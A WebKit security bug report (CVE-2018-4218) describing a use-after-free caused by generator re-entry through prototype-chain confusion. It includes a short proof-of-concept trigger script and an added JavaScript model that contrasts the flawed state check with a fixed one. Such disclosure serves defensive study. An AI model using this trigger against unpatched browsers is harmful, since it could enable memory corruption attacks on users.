Issue metadata

Status: Fixed
Closed: Jun 2018

Issue 1553: WebKit: Use-after-free when resuming generator

Reported by, Mar 24 2018 Project Member

Issue description

In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState, is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:

    var state = this.@generatorState;

and set by calling:

    generator.@generatorState = @GeneratorStateExecuting;

Checking that the @generatorState property is set is also used in place of type checking the generator.

Therefore, if it is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState is set, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.

It is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.

Generators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after-free.

A minimal sample of the script causing this problem is below, and a full PoC is attached.

var iterator;
var a = [];

// foo() resumes with the object it was called through; the loop body swaps
// that object's prototype to the running generator (iterator) before yielding
function* foo(index) {
  while (1) {
    var q = a.pop();
    q.__proto__ = iterator;
    yield index++;
  }
}

// trivial generator used only to give plain objects an own @generatorState
function* foo2() {
}

var temp = foo2(0);

for (var i = 0; i < 10; i++) { // make a few objects with @generatorState set
  var q = {};
  q.__proto__ = temp;
  q.__proto__ = {};
}

iterator = foo(0);

var q = {};
q.__proto__ = iterator;

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Attachment (1.2 KB)
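The following is an added model of the own-property confusion the report describes, written for this page in plain JavaScript. It is not WebKit's GeneratorPrototype.js and not the reporter's PoC: the FlawedGen/FixedGen classes, the numeric states, the frame object and the attack() driver are assumptions made for the illustration. FlawedGen follows the shape of the report: the presence of a state slot doubles as the type check, and the state is read and written through `this`, so a plain object whose prototype is a generator passes the check, the EXECUTING write lands on that object as an own property, and the real generator's state is never consulted while its frame is reused. FixedGen keeps the state in a WeakMap keyed by the real generator object, so nothing reachable through the prototype chain satisfies either the type check or the re-entry guard.

```javascript
// Added model of the flaw described in the report. This is not WebKit's
// GeneratorPrototype.js: the classes, numeric states, frame object and the
// attack() driver are assumptions made for this illustration.

const SUSPENDED = 0, EXECUTING = 1, COMPLETED = 2;

// A frame stands in for the generator's saved scope. It counts nesting so the
// caller can tell whether the body was entered again while already running.
function makeFrame(body) {
  let depth = 0, maxDepth = 0;
  return {
    finished: false,
    step() {
      depth++;
      maxDepth = Math.max(maxDepth, depth);
      const r = body();
      depth--;
      if (r.done) this.finished = true;
      return r.value;
    },
    get reentered() { return maxDepth > 1; },
  };
}

// Flawed resume, shaped like the report's description: the presence of the
// state slot doubles as the type check, and state is read and written through
// `this`. An object whose prototype is a generator inherits the state for the
// check, but the EXECUTING write creates an own property on that object, so
// the real generator's state is never consulted while its frame is reused.
class FlawedGen {
  constructor(frame) { this.state = SUSPENDED; this.frame = frame; }
  resume() {
    const state = this.state;
    if (typeof state !== 'number') throw new TypeError('not a generator');
    if (state === EXECUTING) throw new TypeError('generator is executing');
    if (state === COMPLETED) return { value: undefined, done: true };
    this.state = EXECUTING;
    const value = this.frame.step();
    this.state = this.frame.finished ? COMPLETED : SUSPENDED;
    return { value, done: this.frame.finished };
  }
}

// Fixed resume: a brand check against a private registry keyed by the real
// generator object, with the state kept in that record rather than on `this`.
// Nothing reachable through the prototype chain satisfies the check.
const slots = new WeakMap();
class FixedGen {
  constructor(frame) { slots.set(this, { state: SUSPENDED, frame }); }
  resume() {
    const s = slots.get(this);
    if (s === undefined) throw new TypeError('not a generator');
    if (s.state === EXECUTING) throw new TypeError('generator is executing');
    if (s.state === COMPLETED) return { value: undefined, done: true };
    s.state = EXECUTING;
    const value = s.frame.step();
    s.state = s.frame.finished ? COMPLETED : SUSPENDED;
    return { value, done: s.frame.finished };
  }
}

// Follow the report's recipe: give a plain object an own, non-executing state
// by resuming a trivial generator through it, detach it, then from inside a
// running generator point the object's prototype at that generator and resume.
function attack(Gen) {
  const rejected = [];
  const tryResume = (obj) => { try { obj.resume(); } catch (e) { rejected.push(e.message); } };

  const trivial = new Gen(makeFrame(() => ({ value: 1, done: false })));
  const impostor = Object.setPrototypeOf({}, trivial);
  tryResume(impostor);                       // flawed: passes, leaves impostor.state as an own property
  Object.setPrototypeOf(impostor, Object.prototype);

  let target, attempted = false;
  const frame = makeFrame(() => {
    if (!attempted) {
      attempted = true;
      Object.setPrototypeOf(impostor, target);
      tryResume(impostor);                   // re-entry attempt while target is EXECUTING
    }
    return { value: 2, done: true };
  });
  target = new Gen(frame);
  tryResume(target);

  return {
    reentered: frame.reentered,
    ownState: Object.prototype.hasOwnProperty.call(impostor, 'state'),
    rejected,
  };
}

console.log('flawed:', attack(FlawedGen));
console.log('fixed: ', attack(FixedGen));
```

Run with node: attack(FlawedGen) reports reentered: true with the impostor carrying its own state property and no resume rejected; attack(FixedGen) reports reentered: false and rejects the impostor both times it is resumed through. The model only counts the nested entry, whereas in JavaScriptCore the same re-entry ran a frame whose scope had not been kept alive, which is the use-after-free in the report.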

Comment 2 by, May 30 2018

Project Member
Labels: CVE-2018-4218

Comment 3 by, Jun 7 2018

Project Member
Labels: -Restrict-View-Commit
Status: Fixed (was: New)